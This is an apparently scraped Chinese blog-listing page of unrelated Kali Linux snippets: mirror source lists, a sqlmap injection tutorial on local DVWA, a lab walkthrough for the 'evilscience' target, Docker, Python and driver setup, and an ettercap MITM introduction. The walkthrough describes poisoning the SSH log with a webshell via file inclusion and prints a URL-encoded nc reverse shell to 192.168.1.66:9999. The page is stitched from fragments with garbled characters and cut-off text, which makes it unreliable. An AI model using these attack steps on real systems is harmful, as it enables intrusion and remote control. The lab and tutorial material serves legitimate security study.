kali

kali更改国内源

匿名 (未验证) 提交于 2019-12-02 23:43:01
由于中国特色网络环境,我们必须对lkali2的源进行一下更改,这样速度会比较快。 Look here! 首先,寻找几个国内源:    #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib #清华大学 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙大 deb http://mirrors.zju.edu.cn/kali kali-rolling main

kali之使用sqlmap进行sql注入

匿名 (未验证) 提交于 2019-12-02 23:43:01
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同时执行多条语句的执行时的注入。 sqlmap支持的数据库有 MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB cookie注入 登录网页后在浏览器url栏输入 javascript:document.cookie或者在console栏中输入document.cookie即可获得cookie sqlmap -u "http://可能注入的某个提交参数的url" --cookie="这次提交的cookie" dvwa中测试 sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low;

kali渗透综合靶机(十六)--evilscience靶机

匿名 (未验证) 提交于 2019-12-02 23:42:01
kali渗透综合靶机(十六)--evilscience靶机 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.195 三端口服务识别    四、漏洞查找与利用 1.目录扫描    2. 发现 http://192.168.10.195/fuck ,下载下来没啥用 3.发现http://192.168.10.195/index.php?file=about.php 测试存在本地文件包含    4.包含/etc/passwd,失败,尝试用burp进行模糊测试,可以看到可以包含/var/log/auth.log文件,可以利用ssh登录产生错误日志    5. 利用ssh登录产生错误日志,可以看到错误信息写入到日志中,可以利用ssh错误日志写入一句话木马       6.利用ssh日志写入一句话木马    7.测试一句话是否成功写入,下图可以看到成功执行,然后可以执行任何系统命令    8.反弹shell,需要对反弹shell中特殊符号进行url编码,不要对整个url进行编码 mknod+backpipe+p+%26%26+nc+192.168.1.66+9999+0%3cbackpipe+%7c+%2fbin%2fbash+1

kaliԴ

匿名 (未验证) 提交于 2019-12-02 23:38:02
   qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqu Configuring libc6:amd64 tqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqk x x x There are services installed on your system which need to be restarted when certain libraries, such as libpam, libc, x x and libssl, are upgraded. Since these restarts may cause interruptions of service for the system, you will normally be x x prompted on each upgrade for the list of services you wish to restart. You can choose this option to avoid being x x prompted; instead, all necessary restarts will be done for you automatically so you can avoid being asked

2019最新kali google输入法安装

匿名 (未验证) 提交于 2019-12-02 23:32:01
打开终端: 输入 leafpad /etc/apt/sources.list 然后更改里面的源, 现在时间是19年5.16,如果间隔时间太长,建议百度搜索最新源!! 下面给出现在我用的源: #清华大学 [更新源] deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free #浙江大学[更新源] deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free 随便选一个更新源粘贴上去。 先执行 apt-get clean 再执行 apt-get update 安装需要用的配件 apt-get install fcitx 顺利的话会自动安装成功,如果遇到依赖错误,按提示修复或者输入apt-get -f install 修复,但是如果提示“依赖xxx,但是xxx将不会被安装”,这一般是源太旧

Kali安装Docker

匿名 (未验证) 提交于 2019-12-02 23:04:42
---恢复内容开始--- 先把docker 安装的笔记补上 后百度装apt-get install docker-engine# apt -get install apt -transport -https ca deb https://apt.dockerproject.org/repo debian-wheezy main #On Debian Jessie #deb https://apt.dockerproject.org/repo debian-jessie main #On Debian Stretch/Sid #deb https://apt.dockerproject.org/repo debian-stretch main apt- get update apt- get install docker-engin E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it? --------------------- var/lib/apt/lists/ lock rm

ettercap 实施中间人攻击

匿名 (未验证) 提交于 2019-12-02 23:03:14
中间人攻击(Man-in-the-MiddleAttack 简称"MITM攻击")中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到如今还具有极大的扩展空间,在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段.在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式, 随着计算机通信网技术的不断发展,MITM攻击也越来越多样化.最初,攻击者只要将网卡设为混杂模式,伪装成代理服务器监听特定的流量就可以实现攻击,这是因为很多通信协议都是以明文来进行传输的,如HTTP、FTP、Telnet等.后来,随着交换机代替集线器,简单的嗅探攻击已经不能成功,必须先进行ARP欺骗才行.如今,越来越多的服务商开始采用加密通信 SSL(Secure Sockets Layer 安全套接层)是一种广泛使用的技术,HTTPS、FTPS等都是建立在其基础上的. 今天要将的主要是基于Ettercap的中间人攻击,一般常用的中间人攻击无外乎四种:ARP缓存投毒,ICMP重定向,端口监听,DHCP欺骗.在这里要介绍一下ARP欺骗、DNS欺骗、会话劫持、密码嗅探以及SSL加密的密码嗅探.其实Ettercap的功能是很强大的,从它的插件就可以看到功能有

kali下将Python2.x切换至Python3.x

匿名 (未验证) 提交于 2019-12-02 22:51:30
mkdir /usr/local/Python-3.6 gedit /etc/apt/sources.list 附:官方更新源: deb http://http.kali.org/kali kali-rolling main non-free contrib deb-src http://http.kali.org/kali kali-rolling main non-free contrib 4、 安装依赖 apt-get install -y make build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev ./configure --prefix=/usr/local/Python-3.6/ or ./configure --enable-optimizations --prefix=/usr/local/Python-3.6/ --使用了--enable-optimizations安装出现失败,具体原因不知道 make --编译 make install --编译安装 mv /usr/bin/python /usr/bin/python_bk

nvidia gtx1050在kali linux系统下安装显卡驱动,且可以使用x-setting切换显卡

无人久伴 提交于 2019-12-02 22:08:01
转自:https://www.zzhsec.com/255.html 1.更换源【使用中科大或者官方源都可以】 下面使用中科大的源 root@Andy:/home/dnt# vi /etc/apt/sources.list #中科大 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 2.添加完毕后执行下面的更新指令,进行系统或者工具的更新 root@Andy:/home/dnt# apt-get update && apt-get upgrade && apt-get dist-upgrade 这里解释一下: apt-get update //刷新源,获得最近的软件包的列表 apt-get upgrade //更新系统,系统将现有的Package升级,如果有相依性的问题,而此相依性需要安装其它新的Package或影响到其它Package的相依性时,此Package就不会被升级,会保留下来. apt-get dist-upgrade //可以聪明的解决相依性的问题,如果有相依性问题,需要安装/移除新的Package,就会试着去安装/移除它.

Kali入门配置使用(一)

匿名 (未验证) 提交于 2019-12-02 21:59:42
一、Kali简介 1.1、相关连接 https://en.wikipedia.org/wiki/Kali 1.2、重点介绍 1.3、安装环境 二、安装导入 3.1环境配置 1 切换到用户的主目录: 2 cd 3 用vi编辑.bashrc,这个文件开机后自动生效里面的别名: 4 vi .bashrc 5 把下面的行去掉注释: 6 alias ls='ls --color=auto' 7 alias dir='dir --color=auto' 8 alias vdir='vdir --color=auto' 9 10 alias grep='grep --color=auto' 11 alias fgrep='fgrep --color=auto' 12 alias egrep='egrep --color=auto' 13 14 alias ll='ls -l' 15 alias la='ls -A' 16 alias l='ls -CF 17 然后保存退出,然后生效当前配置: 18 source .bashrc 1 mv /root/Desktop/* /root/Documents/ 1 备份原配置: 2 mv /etc/default/locale /etc/default/locale.backup`date "+%Y%m%d"` 3 查看现在的系统语言环境: 4 echo